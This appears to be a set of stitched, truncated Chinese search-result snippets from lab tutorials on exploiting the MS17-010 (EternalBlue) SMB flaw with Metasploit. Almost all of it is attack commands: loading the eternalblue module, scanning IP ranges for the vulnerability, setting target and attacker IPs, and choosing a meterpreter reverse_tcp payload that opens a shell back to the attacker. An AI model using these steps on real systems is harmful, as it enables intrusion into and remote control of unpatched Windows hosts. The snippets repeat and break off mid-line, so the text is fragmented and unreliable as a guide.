3.msfconsole -qx "use exploit/windows/smb/ms17_010_eternalblue" #启动并加载模块 root@backlion:/opt# wget https://raw.githubusercontent.com/backlion/metasploit-framework/master/modules/exploits/windows/smb/ms17_010_eternalblue.rb root@backlion:/opt# cp ms17_010_eternalblue.rb /usr/share/metasp...
2.msfupdate #msf的更新 3.msfconsole -qx "use exploit/windows/smb/ms17_010_eternalblue" #启动并加载模块 root@backlion:/opt# wget https://raw.githubusercontent.com/backlion/metasploit-framework/master/modules/exploits/windows/smb/ms17_010_eternalblue.rbroot@backlion:/opt# cp ms17_010_eternalblu...
msf利用命令如下: msf > use exploit/windows/smb/ms17_010_eternalblue //加载攻击模块 msf exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.22.25 //配置攻击目标IP RHOSTS => 192.168.22.25 msf exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.5.146 //配置本机IP LHOST...
1.使用辅助模块 use auxiliary/scanner/smb/smb_ms17_010 2.查看漏洞需要的配置 show options 可见该漏洞是需要主机开放445端口,且利用的是SMB服务进行攻击的。 3.探测某ip范围内是有否存在该漏洞的主机 set RHOST 192.168.43.80-192.168.43.180 exploit
use exploit/windows/smb/ms17_010_eternalblue 这里我的windows 7靶机的ip地址可以通过cmd命令去查看,可以看到IPv4地址就是windows 7 的ip地址。 #查看ip地址 ipconfig 在msf里面设置好目标靶机的ip地址 set RHOST 192.168.174.141 查看一下模块的设置,确保我们的设置正确无误 ...
check 进行检测,确认是否存在ms17_010漏洞 setpayload windows/x64/meterpreter/reverse_tcp//加载payload,设置攻击载荷。windows表示靶机操作系统、x64表示64位系统、meterpreter是Metasploit框架中的一个利器,作为漏洞溢出后的攻击载荷使用、reverse_tcp表示从靶机发起一个反向tcp连接到攻击机,默认连接端口为4444,可以...
msf exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.22.25 //配置攻击目标IP RHOSTS => 192.168.22.25 msf exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.5.146 //配置本机IP LHOST => 192.168.5.146 msf exploit(windows/smb/ms17_010_eternalblue) > set payload windo...
提到操作系统漏洞,大家肯定听说过耳熟能详的永恒之蓝(MS17-010)了,他的爆发源于WannaCry勒索病毒的诞生。
ms17_010 //也可以用 use 3 msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhost 192.16...
第一步:通过msfupdate更新smb_ms17_010.rb模块,或者手动拷贝附件一到msf的模块目录下。 Kali linux: /usr/share/metasploit-framework/modules/auxiliary/scanner/smb Windows: C:\\metasploit-framework\embedded\framework\modules\auxiliary\scanner\smb 第二步:连接postgresql数据库,不连接的话扫描的信息的信息无法入...